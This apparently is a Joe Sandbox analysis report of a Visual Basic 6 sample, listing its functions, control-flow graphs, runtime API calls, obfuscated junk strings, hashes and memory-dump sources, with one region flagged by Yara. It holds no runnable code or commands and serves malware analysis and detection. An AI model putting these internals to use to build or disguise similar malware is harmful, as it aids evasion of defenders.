                                                                                                    • Opcode ID: 94e1f129fc792fa6f5103ff915640e43576cf97207cf648ca51283219fba019a
                                                                                                    • Instruction ID: d1eeccd6a81275c9f79f28f8e3a7bfee38bca218a038e7ee877bbb3d07f8b17b
                                                                                                    • Opcode Fuzzy Hash: 94e1f129fc792fa6f5103ff915640e43576cf97207cf648ca51283219fba019a
                                                                                                    • Instruction Fuzzy Hash: AD512971E40228AECB10EFE1DC46AEEBBB5BF08704F60412EE105BB1A1DB785945DB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00422770, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 133COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 0042278E
                                                                                                    • #586.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 004227CD
                                                                                                    • #564.MSVBVM60(00000005,?), ref: 004227F0
                                                                                                    • __vbaHresultCheck.MSVBVM60(00000000), ref: 0042280A
                                                                                                    • __vbaVarTstGe.MSVBVM60(00008003,?), ref: 0042283A
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008003,?), ref: 00422850
                                                                                                    • __vbaFPInt.MSVBVM60(?,?,004015F6), ref: 00422874
                                                                                                    • #587.MSVBVM60(?,?,?,?,004015F6), ref: 0042287E
                                                                                                    • __vbaStrR8.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422888
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,004015F6), ref: 00422892
                                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,004015F6), ref: 004228A0
                                                                                                    • #578.MSVBVM60(ferskvandsfiskenes,000000FF,?,?,?,?,?,?,004015F6), ref: 004228B1
                                                                                                    • #512.MSVBVM60(MIDLERTIDIGE,000000E4,ferskvandsfiskenes,000000FF,?,?,?,?,?,?,004015F6), ref: 004228CA
                                                                                                    • __vbaStrMove.MSVBVM60(MIDLERTIDIGE,000000E4,ferskvandsfiskenes,000000FF,?,?,?,?,?,?,004015F6), ref: 004228D4
                                                                                                    • #629.MSVBVM60(?,00000008,00000061,00000002), ref: 00422912
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000008,00000061,00000002), ref: 0042291B
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000008,00000061,00000002), ref: 00422925
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000008,00000061,00000002), ref: 0042292D
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,?,?,00000008,00000061,00000002), ref: 00422940
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,004015F6), ref: 00422957
                                                                                                    • __vbaFreeStr.MSVBVM60(004229A6,?,?,004015F6), ref: 00422998
                                                                                                    • __vbaFreeStr.MSVBVM60(004229A6,?,?,004015F6), ref: 004229A0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Free$Move$List$#512#564#578#586#587#629CheckChkstkCopyErrorHresult
                                                                                                    • String ID: Follower$MIDLERTIDIGE$ferskvandsfiskenes
                                                                                                    • API String ID: 3788620440-2851547927
                                                                                                    • Opcode ID: a934bec1d579792bae664870f6865b4c3ab27f63342cd3596001b7907960a1ee
                                                                                                    • Instruction ID: 52b3b142c2b8f54aa45094b7284ac5d5b955da3389c8af1bb92a6dd064daef62
                                                                                                    • Opcode Fuzzy Hash: a934bec1d579792bae664870f6865b4c3ab27f63342cd3596001b7907960a1ee
                                                                                                    • Instruction Fuzzy Hash: FB510CB1D00218AADB10EFE1C946BEEB7B8BF04708F50816AE145B71E1DB785B48CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041FA04, Relevance: 4.5, APIs: 3, Instructions: 48COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 160 41fa04-41fa5b __vbaChkstk call 41fac7 162 41fa61-41fa68 160->162 163 41fa84 162->163 164 41fa6a-41fa82 __vbaHresultCheckObj 162->164 165 41fa88-41faa7 __vbaFreeVar 163->165 164->165
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 0041FA20
                                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00401250,0040364C,000006F8), ref: 0041FA7A
                                                                                                    • __vbaFreeVar.MSVBVM60(00000000,00401250,0040364C,000006F8), ref: 0041FA8B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$CheckChkstkFreeHresult
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492882051-0
                                                                                                    • Opcode ID: d17a9e46d55623236fe0e87a1cb822847c658e6fa62edbc06acc3592f0fbf72b
                                                                                                    • Instruction ID: 015e241de5490ac704b9d4acba770fee5fca708564ebbe23596acf096d368634
                                                                                                    • Opcode Fuzzy Hash: d17a9e46d55623236fe0e87a1cb822847c658e6fa62edbc06acc3592f0fbf72b
                                                                                                    • Instruction Fuzzy Hash: 63111871940208FFCB00DF98C945BCD7FB4EF08794F20806AF409AB2A1C7799A85DB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040195C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 168 40195c-401a14 #100 169 401a16-401a79 168->169 170 401a7b-401a9e 168->170 169->170 175 401aa0-401aaa 170->175 176 401a9f-401aaa 170->176 177 401aad-401ab6 175->177 176->177 178 401ab7-401aca 177->178 179 401ab8-401aca 177->179 180 401acd-401ad2 178->180 179->180
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #100
                                                                                                    • String ID: VB5!6&*
                                                                                                    • API String ID: 1341478452-3593831657
                                                                                                    • Opcode ID: 09c2f517ef9ddf11d583556045e94d488c3982481399cfdd421ea7289bcf7bc8
                                                                                                    • Instruction ID: 251dc9ecb88731482c2517662a7a546dc4a81049017ee1211d2b3fec239490de
                                                                                                    • Opcode Fuzzy Hash: 09c2f517ef9ddf11d583556045e94d488c3982481399cfdd421ea7289bcf7bc8
                                                                                                    • Instruction Fuzzy Hash: 8C51217214E3C28FC3038B748C2A1A5BF71AE1721571A85DBC8D2CF0F3D669580ACB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 02AB1099, Relevance: .2, Instructions: 164COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1333152081.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_2ab0000_G47wmLn8uy.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ad16b5dca299b74c207108a6379b60a89d67723654955aea1d4913e9305be9a
                                                                                                    • Instruction ID: 64fcb769f23a75946f6a3643ec5c998af74f39c7a585770b4591c1735bd8c6b4
                                                                                                    • Opcode Fuzzy Hash: 1ad16b5dca299b74c207108a6379b60a89d67723654955aea1d4913e9305be9a
                                                                                                    • Instruction Fuzzy Hash: C9518B3795C3848BC72ACF3890D60CABB75FE51134B2995BAD9A08F807F6228057C741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00424E6F, Relevance: 187.7, APIs: 90, Strings: 17, Instructions: 444COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 356 424e6f-424ed4 __vbaChkstk __vbaStrCopy __vbaAryConstruct2 358 424ed6-424eda 356->358 359 424edc-424ee1 __vbaGenerateBoundsError 356->359 360 424ee4-424f3a #616 __vbaStrMove #523 __vbaStrMove __vbaStrCopy __vbaFreeStrList 358->360 359->360 361 424f45-424f4a __vbaGenerateBoundsError 360->361 362 424f3c-424f43 360->362 363 424f50-424f83 __vbaStrCopy #588 361->363 362->363 364 424f85-424f8c 363->364 365 424f8e-424f93 __vbaGenerateBoundsError 363->365 366 424f99-424fd7 #574 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 364->366 365->366 367 424fe2-424fe7 __vbaGenerateBoundsError 366->367 368 424fd9-424fe0 366->368 369 424fed-425020 __vbaStrCopy 367->369 368->369 370 425022-425029 369->370 371 42502b-425030 __vbaGenerateBoundsError 369->371 372 425036-42507c #703 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 370->372 371->372 373 425087-42508c __vbaGenerateBoundsError 372->373 374 42507e-425085 372->374 375 425092-4250b0 __vbaStrCopy 373->375 374->375 376 4250b2-4250b9 375->376 377 4250bb-4250c0 __vbaGenerateBoundsError 375->377 378 4250c6-4250e4 __vbaStrCopy 376->378 377->378 379 4250e6-4250ed 378->379 380 4250ef-4250f4 __vbaGenerateBoundsError 378->380 381 4250fa-425118 __vbaStrCopy 379->381 380->381 382 425123-425128 __vbaGenerateBoundsError 381->382 383 42511a-425121 381->383 384 42512e-42516a #616 __vbaStrMove __vbaStrCopy __vbaFreeStr 382->384 383->384 385 425175-42517a __vbaGenerateBoundsError 384->385 386 42516c-425173 384->386 387 425180-42519e __vbaStrCopy 385->387 386->387 388 4251a0-4251a7 387->388 389 4251a9-4251ae __vbaGenerateBoundsError 387->389 390 4251b4-4251d2 __vbaStrCopy 388->390 389->390 391 4251d4-4251db 390->391 392 4251dd-4251e2 __vbaGenerateBoundsError 390->392 393 4251e8-425206 __vbaStrCopy 391->393 392->393 394 425211-425216 __vbaGenerateBoundsError 393->394 395 425208-42520f 393->395 396 42521c-42523a __vbaStrCopy 394->396 395->396 397 425245-42524a __vbaGenerateBoundsError 396->397 398 42523c-425243 396->398 399 425250-42527c __vbaStrCopy #541 397->399 398->399 400 425287-42528c __vbaGenerateBoundsError 399->400 401 42527e-425285 399->401 402 425292-4252f6 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar __vbaVarDup #528 400->402 401->402 403 425301-425306 __vbaGenerateBoundsError 402->403 404 4252f8-4252ff 402->404 405 42530c-425354 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList 403->405 404->405 406 425356-42535d 405->406 407 42535f-425364 __vbaGenerateBoundsError 405->407 408 42536a-42539d __vbaStrCopy #539 406->408 407->408 409 4253a8-4253ad __vbaGenerateBoundsError 408->409 410 42539f-4253a6 408->410 411 4253b3-4253f1 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar 409->411 410->411 412 4253f3-4253fa 411->412 413 4253fc-425401 __vbaGenerateBoundsError 411->413 414 425407-425425 __vbaStrCopy 412->414 413->414 415 425430-425435 __vbaGenerateBoundsError 414->415 416 425427-42542e 414->416 417 42543b-42546d #669 __vbaStrMove __vbaStrCopy __vbaFreeStr 415->417 416->417 418 425478-42547d __vbaGenerateBoundsError 417->418 419 42546f-425476 417->419 420 425483-4254bc __vbaStrCopy #575 418->420 419->420 421 4254c7-4254cc __vbaGenerateBoundsError 420->421 422 4254be-4254c5 420->422 423 4254d2-425554 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList __vbaFreeStr __vbaAryDestruct 421->423 422->423
                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00424E8D
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,004015F6), ref: 00424EB7
                                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00404584,00000008,?,?,?,?,004015F6), ref: 00424EC7
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00424EDC
                                                                                                    • #616.MSVBVM60(brash,000000CB), ref: 00424EEE
                                                                                                    • __vbaStrMove.MSVBVM60(brash,000000CB), ref: 00424EF8
                                                                                                    • #523.MSVBVM60(00000000,brash,000000CB), ref: 00424EFE
                                                                                                    • __vbaStrMove.MSVBVM60(00000000,brash,000000CB), ref: 00424F08
                                                                                                    • __vbaStrCopy.MSVBVM60(00000000,brash,000000CB), ref: 00424F18
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,brash,000000CB), ref: 00424F27
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00424F45
                                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00424F5E
                                                                                                    • #588.MSVBVM60(00000021,00000011,00000039), ref: 00424F69
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000021,00000011,00000039), ref: 00424F8E
                                                                                                    • #574.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424F9D
                                                                                                    • __vbaStrMove.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FA7
                                                                                                    • __vbaStrCopy.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FB7
                                                                                                    • __vbaFreeStr.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FBF
                                                                                                    • __vbaFreeVar.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FC7
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FE2
                                                                                                    • __vbaStrCopy.MSVBVM60(00000003,00000021,00000011,00000039), ref: 00424FFB
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000003,00000021,00000011,00000039), ref: 0042502B
                                                                                                    • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425042
                                                                                                    • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042504C
                                                                                                    • __vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042505C
                                                                                                    • __vbaFreeStr.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425064
                                                                                                    • __vbaFreeVar.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042506C
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425087
                                                                                                    • __vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250A0
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250BB
                                                                                                    • __vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250D4
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004250EF
                                                                                                    • __vbaStrCopy.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425108
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425123
                                                                                                    • #616.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425138
                                                                                                    • __vbaStrMove.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425142
                                                                                                    • __vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425152
                                                                                                    • __vbaFreeStr.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042515A
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425175
                                                                                                    • __vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042518E
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251A9
                                                                                                    • __vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251C2
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251DD
                                                                                                    • __vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004251F6
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425211
                                                                                                    • __vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042522A
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425245
                                                                                                    • __vbaStrCopy.MSVBVM60(Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042525E
                                                                                                    • #541.MSVBVM60(00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 0042526C
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425287
                                                                                                    • __vbaStrVarMove.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425296
                                                                                                    • __vbaStrMove.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252A0
                                                                                                    • __vbaStrCopy.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252B0
                                                                                                    • __vbaFreeStr.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252B8
                                                                                                    • __vbaFreeVar.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252C0
                                                                                                    • __vbaVarDup.MSVBVM60(00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252D9
                                                                                                    • #528.MSVBVM60(?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 004252E6
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011,00000039), ref: 00425301
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 00425310
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 0042531A
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 0042532A
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE,00000003,00000021,00000011), ref: 00425332
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000006,?,?,?,00000006,00000006,00000006,3:3:3,Superengrave,000000FD,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00425341
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042535F
                                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00425378
                                                                                                    • #539.MSVBVM60(?,000000D8,000000E6,00000014), ref: 0042538D
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,000000D8,000000E6,00000014), ref: 004253A8
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253B7
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253C1
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253D1
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253D9
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253E1
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 004253FC
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425415
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425430
                                                                                                    • #669.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 0042543B
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425445
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425455
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 0042545D
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425478
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,000000D8,000000E6,00000014), ref: 00425491
                                                                                                    • #575.MSVBVM60(?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254AC
                                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254C7
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254D6
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254E0
                                                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254F0
                                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 004254F8
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003,?,?,000000D8,000000E6,00000014), ref: 00425507
                                                                                                    • __vbaFreeStr.MSVBVM60(00425555,?,?,?,?,?,?,?,?,004015F6), ref: 0042553E
                                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00425555,?,?,?,?,?,?,?,?,004015F6), ref: 0042554F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.1331544420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.1331519380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331757384.0000000000427000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331787354.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                    • Associated: 00000002.00000002.1331825039.000000000042B000.00000002.00020000.sdmp Download File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_G47wmLn8uy.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vba$Copy$BoundsErrorGenerate$Free$Move$List$#616$#523#528#539#541#574#575#588#669#703ChkstkConstruct2Destruct
                                                                                                    • String ID: 3:3:3$Acrobystitis$Arbejdsmaterialerne$Bankerstatning$Besudle$Driftsstyringen9$Emballages$FRSTEHAANDSFORKLARINGENS$POLYGYNIC$REJECTEE$Registranters$Superengrave$Tarzanish9$Vetoes5$bacterious$brash$skrllen
                                                                                                    • API String ID: 1376337971-2520347186
                                                                                                    • Opcode ID: c06f55f5a652419b048ff17ef0b21eebc432ed462cc86b91663247d2885c240e
                                                                                                    • Instruction ID: 526504d4a619d3e4a300508990a312faa3cbc30d9d43923b8c6bdd5a6d112f35
                                                                                                    • Opcode Fuzzy Hash: c06f55f5a652419b048ff17ef0b21eebc432ed462cc86b91663247d2885c240e
                                                                                                    • Instruction Fuzzy Hash: 11121971E00218DBDB20EFA6D941BEDB7B0AF55308F60817EE00677292DB385A46CF19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00423002, Relevance: 98.3, APIs: 47, Strings: 9, Instructions: 317COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __vbaChkstk.MSVBVM60(?,004015F6), ref: 00423020
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00423058
                                                                                                    • __vbaStrI4.MSVBVM60(007829A8), ref: 00423062
                                                                                                    • __vbaStrMove.MSVBVM60(007829A8), ref: 0042306C
                                                                                                    • #667.MSVBVM60(?,00000000,007829A8), ref: 00423076
                                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,007829A8), ref: 00423080
                                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,00000000,007829A8), ref: 00423086
                                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,00000000,007829A8), ref: 004230A4
                                                                                                    • __vbaFreeVar.MSVBVM60(?,?,004015F6), ref: 004230AF
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 004230D7
                                                                                                    • #619.MSVBVM60(?,?,000000C7), ref: 004230E9
                                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,?,000000C7), ref: 004230F2
                                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,000000C7), ref: 004230FC
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,000000C7), ref: 0042310B
                                                                                                    • __vbaVarDup.MSVBVM60 ref: 00423127
                                                                                                    • #717.MSVBVM60(?,?,00000080,00000000), ref: 0042313B
                                                                                                    • __vbaVar2Vec.MSVBVM60(?,?,?,?,00000080,00000000), ref: 00423148
                                                                                                    • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,00000080,00000000), ref: 00423155
                                                                                                    • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,00000080,00000000), ref: 00423164
                                                                                                    • __vbaNew2.MSVBVM60(00403C1C,00427544,?,?,?,?,?,?,?,?,004015F6), ref: 0042317F
